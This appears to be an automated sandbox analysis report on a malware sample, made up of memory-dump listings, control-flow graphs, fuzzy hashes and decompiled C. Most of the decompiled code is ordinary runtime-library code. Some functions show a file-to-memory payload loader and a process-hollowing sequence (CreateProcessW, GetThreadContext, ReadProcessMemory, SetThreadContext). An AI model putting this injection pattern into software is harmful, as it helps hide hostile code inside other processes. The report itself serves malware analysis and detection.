                                          0x01199889
                                          0x0119986d
                                          0x01199869
                                          0x01199851
                                          0x01199829
                                          0x01199825
                                          0x0119980d
                                          0x011997e3
                                          0x011997db
                                          0x0119988f
                                          0x01199895
                                          0x01199897
                                          0x0119990a
                                          0x0119990a
                                          0x0119990e
                                          0x0119991e
                                          0x01199924
                                          0x01199926
                                          0x01199982
                                          0x01199982
                                          0x0119998a
                                          0x0119998b
                                          0x0119998d
                                          0x011999a6
                                          0x011999a9
                                          0x011998e6
                                          0x011998e7
                                          0x00000000
                                          0x011998ec
                                          0x011999af
                                          0x00000000
                                          0x011999af
                                          0x01199994
                                          0x0119999f
                                          0x00000000
                                          0x0119999f
                                          0x01199928
                                          0x0119992b
                                          0x0119992e
                                          0x00000000
                                          0x00000000
                                          0x01199930
                                          0x01199930
                                          0x01199933
                                          0x01199936
                                          0x01199939
                                          0x01199940
                                          0x01199945
                                          0x01199947
                                          0x0119994b
                                          0x01199966
                                          0x0119996a
                                          0x0119996b
                                          0x0119996e
                                          0x0119996f
                                          0x0119997b
                                          0x01199971
                                          0x01199971
                                          0x01199971
                                          0x0119994d
                                          0x0119994d
                                          0x0119994d
                                          0x01199958
                                          0x0119995d
                                          0x01199960
                                          0x01199960
                                          0x00000000
                                          0x01199945
                                          0x0119989c
                                          0x0119989f
                                          0x011998a6
                                          0x011998ab
                                          0x00000000
                                          0x00000000
                                          0x011998b4
                                          0x011998ba
                                          0x011998bc
                                          0x00000000
                                          0x00000000
                                          0x011998be
                                          0x011998c2
                                          0x00000000
                                          0x00000000
                                          0x011998d6
                                          0x011998dc
                                          0x011998de
                                          0x01199902
                                          0x01199905
                                          0x00000000
                                          0x01199905
                                          0x011998e0
                                          0x00000000
                                          0x0119976e
                                          0x01199773
                                          0x0119977e
                                          0x011998ed
                                          0x011998ed
                                          0x011998ed
                                          0x011998f0
                                          0x011998f1
                                          0x00000000
                                          0x011998f9
                                          0x0119976c
                                          0x0119973b
                                          0x011996e6
                                          0x011996e9
                                          0x011996fd
                                          0x011996ff
                                          0x01199720
                                          0x01199723
                                          0x01199726
                                          0x01199729
                                          0x00000000
                                          0x01199729
                                          0x00000000
                                          0x011996eb
                                          0x011996eb
                                          0x011996ee
                                          0x011996f1
                                          0x00000000
                                          0x011996f1
                                          0x011996e9
                                          0x0119969e
                                          0x011996a3
                                          0x011996ab
                                          0x00000000
                                          0x0119963b
                                          0x01199640
                                          0x01199643
                                          0x01199648
                                          0x011999d2
                                          0x00000000
                                          0x011999d2

                                          Memory Dump Source
                                          • Source File: 00000001.00000002.255634635.0000000001191000.00000020.00000001.01000000.00000004.sdmp, Offset: 01190000, based on PE: true
                                          • Associated: 00000001.00000002.255620385.0000000001190000.00000002.00000001.01000000.00000004.sdmpDownload File
                                          • Associated: 00000001.00000002.255689187.00000000011A0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                          • Associated: 00000001.00000002.255702128.00000000011A7000.00000004.00000001.01000000.00000004.sdmpDownload File
                                          • Associated: 00000001.00000002.255702128.00000000011A9000.00000004.00000001.01000000.00000004.sdmpDownload File
                                          • Associated: 00000001.00000002.255717575.00000000011AC000.00000002.00000001.01000000.00000004.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_1_2_1190000_dlcmto.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 5f494dfd85a275fed8fce7efdff0bfcf9158620e48dfb12aa0bbf00e1380d51c
                                          • Instruction ID: 31caa9989e3ad818e70dfd1e2e2943bf573e4f5ac0ef3d1bd5665acc5a62941f
                                          • Opcode Fuzzy Hash: 5f494dfd85a275fed8fce7efdff0bfcf9158620e48dfb12aa0bbf00e1380d51c
                                          • Instruction Fuzzy Hash: A8C1BF70A0424E9FDF1DDFADD880BAD7BB1AF59318F04406DE535AB282DB349941CB61
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 0119C410 Relevance: 13.8, APIs: 9, Instructions: 273COMMONLIBRARYCODE
                                          Download Yara Rule

                                          Control-flow Graph

                                          • Executed
                                          • Not Executed
                                          control_flow_graph 142 119c410-119c440 call 119c890 145 119c45b-119c467 call 1198bf2 142->145 146 119c442-119c44d call 1196e52 142->146 152 119c469-119c47e call 1196e52 call 1196e3f 145->152 153 119c480-119c4c9 call 119c7fb 145->153 151 119c44f-119c456 call 1196e3f 146->151 163 119c735-119c739 151->163 152->151 161 119c4cb-119c4d4 153->161 162 119c536-119c53f GetFileType 153->162 167 119c50b-119c531 GetLastError call 1196e65 161->167 168 119c4d6-119c4da 161->168 164 119c588-119c58b 162->164 165 119c541-119c572 GetLastError call 1196e65 CloseHandle 162->165 170 119c58d-119c592 164->170 171 119c594-119c59a 164->171 165->151 179 119c578-119c583 call 1196e3f 165->179 167->151 168->167 172 119c4dc-119c509 call 119c7fb 168->172 175 119c59e-119c5ec call 1198d96 170->175 171->175 176 119c59c 171->176 172->162 172->167 185 119c60b-119c633 call 119cab4 175->185 186 119c5ee-119c5fa call 119ca0a 175->186 176->175 179->151 192 119c638-119c679 185->192 193 119c635-119c636 185->193 186->185 191 119c5fc 186->191 194 119c5fe-119c606 call 119d5eb 191->194 195 119c67b-119c67f 192->195 196 119c69a-119c6a8 192->196 193->194 194->163 195->196 198 119c681-119c695 195->198 199 119c6ae-119c6b2 196->199 200 119c733 196->200 198->196 199->200 202 119c6b4-119c6e7 CloseHandle call 119c7fb 199->202 200->163 205 119c6e9-119c715 GetLastError call 1196e65 call 1198d05 202->205 206 119c71b-119c72f 202->206 205->206 206->200
                                          C-Code - Quality: 42%
                                          			E0119C410(void* __ecx, void* __eflags, intOrPtr* _a4, signed int* _a8, intOrPtr _a12, signed int _a16, intOrPtr _a20, intOrPtr _a24) {
				signed int _v5;
				char _v6;
				void* _v12;
				signed int _v16;
				signed int _v20;
				char _v24;
				intOrPtr _v36;
				signed int _v44;
				void _v48;
				char _v72;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				signed int _t114;
				void* _t122;
				signed int _t123;
				signed char _t124;
				signed int _t134;
				intOrPtr _t162;
				intOrPtr _t178;
				signed int* _t186;
				void* _t188;
				signed int* _t189;
				signed int _t191;
				char _t196;
				signed int _t202;
				signed int _t205;
				signed int _t214;
				signed int _t216;
				signed int _t218;
				signed int _t224;
				signed int _t226;
				signed int _t233;
				signed int _t234;
				signed int _t236;
				signed int _t238;
				signed char _t241;
				signed int _t242;
				intOrPtr _t246;
				void* _t249;
				void* _t253;
				void* _t263;
				signed int _t264;
				signed int _t267;
				signed int _t268;
				signed int _t271;
				void* _t273;
				void* _t275;
				void* _t276;
				void* _t278;
				void* _t279;
				void* _t281;
				void* _t285;
				signed int _t289;

				_t263 = E0119C890(__ecx,  &_v72, _a16, _a20, _a24);
				_t191 = 6;
				memcpy( &_v48, _t263, _t191 << 2);
				_t275 = _t273 + 0x1c;
				_t249 = _t263 + _t191 + _t191;
				_t264 = _t263 | 0xffffffff;
				_t288 = _v36 - _t264;
				if(_v36 != _t264) {
					_t114 = E01198BF2(_t188, _t249, _t264, __eflags);
					_t189 = _a8;
					 *_t189 = _t114;
					__eflags = _t114 - _t264;
					if(__eflags != 0) {
						_v20 = _v20 & 0x00000000;
						_v24 = 0xc;
						_t276 = _t275 - 0x18;
						 *_a4 = 1;
						_push(6);
						_v16 =  !(_a16 >> 7) & 1;
						_push( &_v24);
						_push(_a12);
						memcpy(_t276,  &_v48, 1 << 2);
						_t196 = 0;
						_t122 = E0119C7FB(); // executed
						_t253 = _t122;
						_t278 = _t276 + 0x2c;
						_v12 = _t253;
						__eflags = _t253 - 0xffffffff;
						if(_t253 != 0xffffffff) {
							L11:
							_t123 = GetFileType(_t253); // executed
							__eflags = _t123;
							if(_t123 != 0) {
								__eflags = _t123 - 2;
								if(_t123 != 2) {
									__eflags = _t123 - 3;
									_t124 = _v48;
									if(_t123 == 3) {
										_t124 = _t124 | 0x00000008;
										__eflags = _t124;
									}
								} else {
									_t124 = _v48 | 0x00000040;
								}
								_v5 = _t124;
								E01198D96(_t196, _t253,  *_t189, _t253);
								_t241 = _v5 | 0x00000001;
								_v5 = _t241;
								_v48 = _t241;
								 *( *((intOrPtr*)(0x11a9458 + ( *_t189 >> 6) * 4)) + 0x28 + ( *_t189 & 0x0000003f) * 0x38) = _t241;
								_t202 =  *_t189;
								_t204 = (_t202 & 0x0000003f) * 0x38;
								__eflags = _a16 & 0x00000002;
								 *((char*)( *((intOrPtr*)(0x11a9458 + (_t202 >> 6) * 4)) + 0x29 + (_t202 & 0x0000003f) * 0x38)) = 0;
								if((_a16 & 0x00000002) == 0) {
									L22:
									_v6 = 0;
									_push( &_v6);
									_push(_a16);
									_t279 = _t278 - 0x18;
									_t205 = 6;
									_push( *_t189);
									memcpy(_t279,  &_v48, _t205 << 2);
									_t134 = E0119CAB4(_t189, 0);
									_t242 =  *_t189;
									_t267 = _t134;
									_t281 = _t279 + 0x30;
									__eflags = _t267;
									if(__eflags == 0) {
										 *((char*)( *((intOrPtr*)(0x11a9458 + (_t242 >> 6) * 4)) + 0x29 + (_t242 & 0x0000003f) * 0x38)) = _v6;
										 *( *((intOrPtr*)(0x11a9458 + ( *_t189 >> 6) * 4)) + 0x2d + ( *_t189 & 0x0000003f) * 0x38) =  *( *((intOrPtr*)(0x11a9458 + ( *_t189 >> 6) * 4)) + 0x2d + ( *_t189 & 0x0000003f) * 0x38) ^ (_a16 >> 0x00000010 ^  *( *((intOrPtr*)(0x11a9458 + ( *_t189 >> 6) * 4)) + 0x2d + ( *_t189 & 0x0000003f) * 0x38)) & 0x00000001;
										__eflags = _v5 & 0x00000048;
										if((_v5 & 0x00000048) == 0) {
											__eflags = _a16 & 0x00000008;
											if((_a16 & 0x00000008) != 0) {
												_t224 =  *_t189;
												_t226 = (_t224 & 0x0000003f) * 0x38;
												_t162 =  *((intOrPtr*)(0x11a9458 + (_t224 >> 6) * 4));
												_t87 = _t162 + _t226 + 0x28;
												 *_t87 =  *(_t162 + _t226 + 0x28) | 0x00000020;
												__eflags =  *_t87;
											}
										}
										_t268 = _v44;
										__eflags = (_t268 & 0xc0000000) - 0xc0000000;
										if((_t268 & 0xc0000000) != 0xc0000000) {
											L32:
											__eflags = 0;
											return 0;
										} else {
											__eflags = _a16 & 0x00000001;
											if((_a16 & 0x00000001) == 0) {
												goto L32;
											}
											CloseHandle(_v12);
											_v44 = _t268 & 0x7fffffff;
											_t214 = 6;
											_push( &_v24);
											_push(_a12);
											memcpy(_t281 - 0x18,  &_v48, _t214 << 2);
											_t246 = E0119C7FB();
											__eflags = _t246 - 0xffffffff;
											if(_t246 != 0xffffffff) {
												_t216 =  *_t189;
												_t218 = (_t216 & 0x0000003f) * 0x38;
												__eflags = _t218;
												 *((intOrPtr*)( *((intOrPtr*)(0x11a9458 + (_t216 >> 6) * 4)) + _t218 + 0x18)) = _t246;
												goto L32;
											}
											E01196E65(GetLastError());
											 *( *((intOrPtr*)(0x11a9458 + ( *_t189 >> 6) * 4)) + 0x28 + ( *_t189 & 0x0000003f) * 0x38) =  *( *((intOrPtr*)(0x11a9458 + ( *_t189 >> 6) * 4)) + 0x28 + ( *_t189 & 0x0000003f) * 0x38) & 0x000000fe;
											E01198D05( *_t189);
											L10:
											goto L2;
										}
									}
									_push(_t242);
									goto L21;
								} else {
									_t267 = E0119CA0A(_t204,  *_t189);
									__eflags = _t267;
									if(__eflags == 0) {
										goto L22;
									}
									_push( *_t189);
									L21:
									E0119D5EB(__eflags);
									return _t267;
								}
							}
							_t271 = GetLastError();
							E01196E65(_t271);
							 *( *((intOrPtr*)(0x11a9458 + ( *_t189 >> 6) * 4)) + 0x28 + ( *_t189 & 0x0000003f) * 0x38) =  *( *((intOrPtr*)(0x11a9458 + ( *_t189 >> 6) * 4)) + 0x28 + ( *_t189 & 0x0000003f) * 0x38) & 0x000000fe;
							CloseHandle(_t253);
							__eflags = _t271;
							if(__eflags == 0) {
								 *((intOrPtr*)(E01196E3F(__eflags))) = 0xd;
							}
							goto L2;
						}
						_t233 = _v44;
						__eflags = (_t233 & 0xc0000000) - 0xc0000000;
						if((_t233 & 0xc0000000) != 0xc0000000) {
							L9:
							_t234 =  *_t189;
							_t236 = (_t234 & 0x0000003f) * 0x38;
							_t178 =  *((intOrPtr*)(0x11a9458 + (_t234 >> 6) * 4));
							_t33 = _t178 + _t236 + 0x28;
							 *_t33 =  *(_t178 + _t236 + 0x28) & 0x000000fe;
							__eflags =  *_t33;
							E01196E65(GetLastError());
							goto L10;
						}
						__eflags = _a16 & 0x00000001;
						if((_a16 & 0x00000001) == 0) {
							goto L9;
						}
						_t285 = _t278 - 0x18;
						_v44 = _t233 & 0x7fffffff;
						_t238 = 6;
						_push( &_v24);
						_push(_a12);
						memcpy(_t285,  &_v48, _t238 << 2);
						_t196 = 0;
						_t253 = E0119C7FB();
						_t278 = _t285 + 0x2c;
						_v12 = _t253;
						__eflags = _t253 - 0xffffffff;
						if(_t253 != 0xffffffff) {
							goto L11;
						}
						goto L9;
					} else {
						 *(E01196E52(__eflags)) =  *_t184 & 0x00000000;
						 *_t189 = _t264;
						 *((intOrPtr*)(E01196E3F(__eflags))) = 0x18;
						goto L2;
					}
				} else {
					_t186 = E01196E52(_t288);
					 *_t186 =  *_t186 & 0x00000000;
					_t289 =  *_t186;
					 *_a8 = _t264;
					L2:
					return  *((intOrPtr*)(E01196E3F(_t289)));
				}
			}


























































                                          0x0119c433
                                          0x0119c437
                                          0x0119c438
                                          0x0119c438
                                          0x0119c438
                                          0x0119c43a
                                          0x0119c43d
                                          0x0119c440
                                          0x0119c45b
                                          0x0119c460
                                          0x0119c463
                                          0x0119c465
                                          0x0119c467
                                          0x0119c486
                                          0x0119c48d
                                          0x0119c494
                                          0x0119c497
                                          0x0119c4a3
                                          0x0119c4a6
                                          0x0119c4ae
                                          0x0119c4af
                                          0x0119c4b2
                                          0x0119c4b2
                                          0x0119c4b4
                                          0x0119c4b9
                                          0x0119c4bb
                                          0x0119c4be
                                          0x0119c4c6
                                          0x0119c4c9
                                          0x0119c536
                                          0x0119c537
                                          0x0119c53d
                                          0x0119c53f
                                          0x0119c588
                                          0x0119c58b
                                          0x0119c594
                                          0x0119c597
                                          0x0119c59a
                                          0x0119c59c
                                          0x0119c59c
                                          0x0119c59c
                                          0x0119c58d
                                          0x0119c590
                                          0x0119c590
                                          0x0119c5a1
                                          0x0119c5a4
                                          0x0119c5b0
                                          0x0119c5b5
                                          0x0119c5c1
                                          0x0119c5cb
                                          0x0119c5cf
                                          0x0119c5d9
                                          0x0119c5dc
                                          0x0119c5e7
                                          0x0119c5ec
                                          0x0119c60b
                                          0x0119c60e
                                          0x0119c612
                                          0x0119c613
                                          0x0119c619
                                          0x0119c61e
                                          0x0119c621
                                          0x0119c623
                                          0x0119c625
                                          0x0119c62a
                                          0x0119c62c
                                          0x0119c62e
                                          0x0119c631
                                          0x0119c633
                                          0x0119c64d
                                          0x0119c671
                                          0x0119c675
                                          0x0119c679
                                          0x0119c67b
                                          0x0119c67f
                                          0x0119c681
                                          0x0119c68b
                                          0x0119c68e
                                          0x0119c695
                                          0x0119c695
                                          0x0119c695
                                          0x0119c695
                                          0x0119c67f
                                          0x0119c69a
                                          0x0119c6a6
                                          0x0119c6a8
                                          0x0119c733
                                          0x0119c733
                                          0x00000000
                                          0x0119c6ae
                                          0x0119c6ae
                                          0x0119c6b2
                                          0x00000000
                                          0x00000000
                                          0x0119c6b7
                                          0x0119c6c9
                                          0x0119c6d1
                                          0x0119c6d4
                                          0x0119c6d5
                                          0x0119c6d8
                                          0x0119c6df
                                          0x0119c6e4
                                          0x0119c6e7
                                          0x0119c71b
                                          0x0119c725
                                          0x0119c725
                                          0x0119c72f
                                          0x00000000
                                          0x0119c72f
                                          0x0119c6f0
                                          0x0119c709
                                          0x0119c710
                                          0x0119c530
                                          0x00000000
                                          0x0119c530
                                          0x0119c6a8
                                          0x0119c635
                                          0x00000000
                                          0x0119c5ee
                                          0x0119c5f5
                                          0x0119c5f8
                                          0x0119c5fa
                                          0x00000000
                                          0x00000000
                                          0x0119c5fc
                                          0x0119c5fe
                                          0x0119c5fe
                                          0x00000000
                                          0x0119c604
                                          0x0119c5ec
                                          0x0119c547
                                          0x0119c54a
                                          0x0119c565
                                          0x0119c56a
                                          0x0119c570
                                          0x0119c572
                                          0x0119c57d
                                          0x0119c57d
                                          0x00000000
                                          0x0119c572
                                          0x0119c4cb
                                          0x0119c4d2
                                          0x0119c4d4
                                          0x0119c50b
                                          0x0119c50b
                                          0x0119c515
                                          0x0119c518
                                          0x0119c51f
                                          0x0119c51f
                                          0x0119c51f
                                          0x0119c52b
                                          0x00000000
                                          0x0119c52b
                                          0x0119c4d6
                                          0x0119c4da
                                          0x00000000
                                          0x00000000
                                          0x0119c4dc
                                          0x0119c4eb
                                          0x0119c4f0
                                          0x0119c4f3
                                          0x0119c4f4
                                          0x0119c4f7
                                          0x0119c4f7
                                          0x0119c4fe
                                          0x0119c500
                                          0x0119c503
                                          0x0119c506
                                          0x0119c509
                                          0x00000000
                                          0x00000000
                                          0x00000000
                                          0x0119c469
                                          0x0119c46e
                                          0x0119c471
                                          0x0119c478
                                          0x00000000
                                          0x0119c478
                                          0x0119c442
                                          0x0119c442
                                          0x0119c447
                                          0x0119c447
                                          0x0119c44d
                                          0x0119c44f
                                          0x00000000
                                          0x0119c454

                                          APIs
                                            • Part of subcall function 0119C7FB: CreateFileW.KERNELBASE(00000000,00000000,?,0119C4B9,?,?,00000000,?,0119C4B9,00000000,0000000C), ref: 0119C818
                                          • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 0119C524
                                          • __dosmaperr.LIBCMT ref: 0119C52B
                                          • GetFileType.KERNELBASE(00000000), ref: 0119C537
                                          • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 0119C541
                                          • __dosmaperr.LIBCMT ref: 0119C54A
                                          • CloseHandle.KERNEL32(00000000), ref: 0119C56A
                                          • CloseHandle.KERNEL32(01199280), ref: 0119C6B7
                                          • GetLastError.KERNEL32 ref: 0119C6E9
                                          • __dosmaperr.LIBCMT ref: 0119C6F0
                                          Memory Dump Source
                                          • Source File: 00000001.00000002.255634635.0000000001191000.00000020.00000001.01000000.00000004.sdmp, Offset: 01190000, based on PE: true
                                          • Associated: 00000001.00000002.255620385.0000000001190000.00000002.00000001.01000000.00000004.sdmpDownload File
                                          • Associated: 00000001.00000002.255689187.00000000011A0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                          • Associated: 00000001.00000002.255702128.00000000011A7000.00000004.00000001.01000000.00000004.sdmpDownload File
                                          • Associated: 00000001.00000002.255702128.00000000011A9000.00000004.00000001.01000000.00000004.sdmpDownload File
                                          • Associated: 00000001.00000002.255717575.00000000011AC000.00000002.00000001.01000000.00000004.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_1_2_1190000_dlcmto.jbxd
                                          Similarity
                                          • API ID: ErrorLast__dosmaperr$CloseFileHandle$CreateType
                                          • String ID:
                                          • API String ID: 4237864984-0
                                          • Opcode ID: a43645632df98253e62eb191b4f0502a45de8ace63bafa250ea5a3376bfc6628
                                          • Instruction ID: 8445861f5b90d61105adcbcbe4d5b55bf587d1866694240c0283b4f485d764c9
                                          • Opcode Fuzzy Hash: a43645632df98253e62eb191b4f0502a45de8ace63bafa250ea5a3376bfc6628
                                          • Instruction Fuzzy Hash: F5A11632A041598FDF2DDF7CD891BAE3BA1AB46324F140159E861AF391DB349942C7A1
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 009F0D63 Relevance: 10.7, APIs: 7, Instructions: 194filememoryCOMMON
                                          Download Yara Rule

                                          Control-flow Graph

                                          • Executed
                                          • Not Executed
                                          control_flow_graph 211 9f0d63-9f0e33 call 9f005f call 9f0073 * 7 call 9f0109 CreateFileW 230 9f0e39-9f0e44 211->230 231 9f0f12 211->231 230->231 236 9f0e4a-9f0e5a VirtualAlloc 230->236 232 9f0f14-9f0f19 231->232 234 9f0f1f-9f0f24 232->234 235 9f0f1b 232->235 239 9f0f40-9f0f43 234->239 235->234 236->231 238 9f0e60-9f0e6f ReadFile 236->238 238->231 240 9f0e75-9f0e94 VirtualAlloc 238->240 241 9f0f26-9f0f2a 239->241 242 9f0f45-9f0f4a 239->242 243 9f0f0e-9f0f10 240->243 244 9f0e96-9f0ea9 call 9f00da 240->244 245 9f0f2c-9f0f34 241->245 246 9f0f36-9f0f38 241->246 247 9f0f4c-9f0f54 VirtualFree 242->247 248 9f0f57-9f0f5f 242->248 243->232 253 9f0eab-9f0eb6 244->253 254 9f0ee4-9f0ef4 call 9f0073 244->254 245->239 251 9f0f3f 246->251 252 9f0f3a-9f0f3d 246->252 247->248 251->239 252->239 255 9f0eb9-9f0ee2 call 9f00da 253->255 254->232 260 9f0ef6-9f0efb 254->260 255->254 261 9f0efd-9f0efe FindCloseChangeNotification 260->261 262 9f0f01-9f0f0c VirtualFree 260->262 261->262 262->239
                                          APIs
                                          • CreateFileW.KERNELBASE(00000000,80000000,00000007,00000000,00000003,00000080,00000000,?,?,?,?,?,?,?,009F15F9,7FAB7E30), ref: 009F0E29
                                          • VirtualAlloc.KERNELBASE(00000000,00000000,00003000,00000004,?,?,?,?,?,?,?,009F15F9,7FAB7E30,009F12B7,00000000,00000040), ref: 009F0E53
                                          • ReadFile.KERNELBASE(00000000,00000000,0000000E,7FAB7E30,00000000,?,?,?,?,?,?,?,009F15F9,7FAB7E30,009F12B7,00000000), ref: 009F0E6A
                                          • VirtualAlloc.KERNELBASE(00000000,00000000,00003000,00000004,?,?,?,?,?,?,?,009F15F9,7FAB7E30,009F12B7,00000000,00000040), ref: 009F0E8C
                                          • FindCloseChangeNotification.KERNELBASE(00000000,?,?,?,?,?,?,?,009F15F9,7FAB7E30,009F12B7,00000000,00000040,?,00000000,0000000E), ref: 009F0EFE
                                          • VirtualFree.KERNELBASE(00000000,00000000,00008000,?,?,?,?,?,?,?,009F15F9,7FAB7E30,009F12B7,00000000,00000040,?), ref: 009F0F09
                                          • VirtualFree.KERNELBASE(00000000,00000000,00008000,?,?,?,?,?,?,?,009F15F9,7FAB7E30,009F12B7,00000000,00000040,?), ref: 009F0F54
                                          Memory Dump Source
                                          • Source File: 00000001.00000002.255511525.00000000009F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 009F0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_1_2_9f0000_dlcmto.jbxd
                                          Similarity
                                          • API ID: Virtual$AllocFileFree$ChangeCloseCreateFindNotificationRead
                                          • String ID:
                                          • API String ID: 656311269-0
                                          • Opcode ID: 250d15ecf6c7738503bca3e33432649ddd9c7296a2462059e8ed9e00926438ed
                                          • Instruction ID: b60490d2dc432e03524667e582bb89f56ba4b907e04530a34ea19961483409ba
                                          • Opcode Fuzzy Hash: 250d15ecf6c7738503bca3e33432649ddd9c7296a2462059e8ed9e00926438ed
                                          • Instruction Fuzzy Hash: 71518A71E0021DABDB209FB4DC85BBEBBBDAF88710F144555FA54F7282EA749900CB64
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 009F020A Relevance: 9.2, APIs: 4, Strings: 1, Instructions: 425COMMON
                                          Download Yara Rule

                                          Control-flow Graph

                                          • Executed
                                          • Not Executed
                                          control_flow_graph 263 9f020a-9f0225 call 9f005f 266 9f0228-9f022c 263->266 267 9f022e-9f0242 266->267 268 9f0244-9f0251 266->268 267->266 269 9f0254-9f0258 268->269 270 9f025a-9f026e 269->270 271 9f0270-9f027d 269->271 270->269 272 9f0280-9f0284 271->272 273 9f029c-9f037a call 9f0073 * 8 272->273 274 9f0286-9f029a 272->274 291 9f037c-9f0386 273->291 292 9f0391 273->292 274->272 291->292 293 9f0388-9f038f 291->293 294 9f0395-9f03b1 292->294 293->294 296 9f03ba 294->296 297 9f03b3-9f03b5 294->297 299 9f03c1-9f03e9 CreateProcessW 296->299 298 9f0734-9f0737 297->298 300 9f03eb 299->300 301 9f03f0-9f0409 GetThreadContext 299->301 302 9f06e8-9f06ec 300->302 303 9f040b 301->303 304 9f0410-9f042d ReadProcessMemory 301->304 307 9f06ee-9f06f2 302->307 308 9f0731-9f0733 302->308 303->302 305 9f042f 304->305 306 9f0434-9f043d 304->306 305->302 309 9f043f-9f044e 306->309 310 9f0464-9f0483 call 9f11a9 306->310 311 9f0705-9f0709 307->311 312 9f06f4-9f06ff 307->312 308->298 309->310 313 9f0450-9f045d call 9f1114 309->313 325 9f048a-9f04ab call 9f12c3 310->325 326 9f0485 310->326 315 9f070b 311->315 316 9f0711-9f0715 311->316 312->311 313->310 328 9f045f 313->328 315->316 320 9f071d-9f0721 316->320 321 9f0717 316->321 322 9f072d-9f072f 320->322 323 9f0723-9f0728 call 9f1114 320->323 321->320 322->298 323->322 331 9f04ad-9f04b4 325->331 332 9f04f0-9f0510 call 9f12c3 325->332 326->302 328->302 333 9f04eb 331->333 334 9f04b6-9f04e2 call 9f12c3 331->334 339 9f0517-9f052c call 9f00da 332->339 340 9f0512 332->340 333->302 341 9f04e9 334->341 342 9f04e4 334->342 345 9f0535-9f053f 339->345 340->302 341->332 342->302 346 9f0571-9f0575 345->346 347 9f0541-9f056f call 9f00da 345->347 349 9f057b-9f0589 346->349 350 9f0655-9f0671 call 9f0f62 346->350 347->345 349->350 352 9f058f-9f059d 349->352 357 9f0675-9f0696 SetThreadContext 350->357 358 9f0673 350->358 352->350 356 9f05a3-9f05c3 352->356 359 9f05c6-9f05ca 356->359 360 9f069a-9f06a4 call 9f1063 357->360 361 9f0698 357->361 358->302 359->350 362 9f05d0-9f05e5 359->362 368 9f06a8-9f06ac 360->368 369 9f06a6 360->369 361->302 364 9f05f7-9f05fb 362->364 366 9f05fd-9f0609 364->366 367 9f0638-9f0650 364->367 370 9f060b-9f0634 366->370 371 9f0636 366->371 367->359 372 9f06ae 368->372 373 9f06b4-9f06b8 368->373 369->302 370->371 371->364 372->373 375 9f06ba 373->375 376 9f06c0-9f06c4 373->376 375->376 377 9f06cc-9f06d0 376->377 378 9f06c6 376->378 379 9f06dc-9f06e2 377->379 380 9f06d2-9f06d7 call 9f1114 377->380 378->377 379->299 379->302 380->379
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000001.00000002.255511525.00000000009F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 009F0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_1_2_9f0000_dlcmto.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: D
                                          • API String ID: 0-2746444292
                                          • Opcode ID: adb94efa6073e6def23d8265e759dd91d0e6d644625b20386d26163ec6207203
                                          • Instruction ID: 2d1cafc6c024f5c66fe0474ab0ca9a88e6ef9d99b75ab65dd3a584d9442c62f8
                                          • Opcode Fuzzy Hash: adb94efa6073e6def23d8265e759dd91d0e6d644625b20386d26163ec6207203
                                          • Instruction Fuzzy Hash: F502E170E0020CEFDB14DF94C985BBDBBB9BF84305F244169E615AA2A2D774AA90DF14
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 01198765 Relevance: 4.6, APIs: 3, Instructions: 68COMMON
                                          Download Yara Rule

                                          Control-flow Graph

                                          • Executed
                                          • Not Executed
                                          control_flow_graph 420 1198765-119877a GetEnvironmentStringsW 421 119877c-119879d call 11987e9 call 11986b8 420->421 422 11987d5 420->422 421->422 430 119879f-11987a0 call 1197200 421->430 424 11987d7-11987d9 422->424 426 11987db-11987dc FreeEnvironmentStringsW 424->426 427 11987e2-11987e8 424->427 426->427 432 11987a5-11987aa 430->432 433 11987ca 432->433 434 11987ac-11987c2 call 11986b8 432->434 436 11987cc-11987d3 call 11963fe 433->436 434->433 439 11987c4-11987c8 434->439 436->424 439->436
                                          C-Code - Quality: 100%
                                          			E01198765(void* __ecx) {
				intOrPtr _v8;
				intOrPtr _t7;
				void* _t8;
				void* _t13;
				void* _t24;
				WCHAR* _t26;

				_t26 = GetEnvironmentStringsW();
				if(_t26 == 0) {
					L7:
					_t13 = 0;
				} else {
					_t17 = E011987E9(_t26) - _t26 >> 1;
					_t7 = E011986B8(0, 0, _t26, E011987E9(_t26) - _t26 >> 1, 0, 0, 0, 0);
					_v8 = _t7;
					if(_t7 == 0) {
						goto L7;
					} else {
						_t8 = E01197200(_t7); // executed
						_t24 = _t8;
						if(_t24 == 0 || E011986B8(0, 0, _t26, _t17, _t24, _v8, 0, 0) == 0) {
							_t13 = 0;
						} else {
							_t13 = _t24;
							_t24 = 0;
						}
						E011963FE(_t24);
					}
				}
				if(_t26 != 0) {
					FreeEnvironmentStringsW(_t26);
				}
				return _t13;
			}









                                          0x01198774
                                          0x0119877a
                                          0x011987d5
                                          0x011987d5
                                          0x0119877c
                                          0x0119878a
                                          0x01198790
                                          0x01198798
                                          0x0119879d
                                          0x00000000
                                          0x0119879f
                                          0x011987a0
                                          0x011987a5
                                          0x011987aa
                                          0x011987ca
                                          0x011987c4
                                          0x011987c4
                                          0x011987c6
                                          0x011987c6
                                          0x011987cd
                                          0x011987d2
                                          0x0119879d
                                          0x011987d9
                                          0x011987dc
                                          0x011987dc
                                          0x011987e8

                                          APIs
                                          • GetEnvironmentStringsW.KERNEL32(00000000,00000000,00000000,?,?,01193763,00000000,00000000,01193842,01198896,00000000,00000000,00000000,?,01193987,00000000), ref: 0119876E
                                          • FreeEnvironmentStringsW.KERNEL32(00000000,?,?,01193763,00000000,00000000,01193842,01198896,00000000,00000000,00000000,?,01193987,00000000,00000000), ref: 011987DC
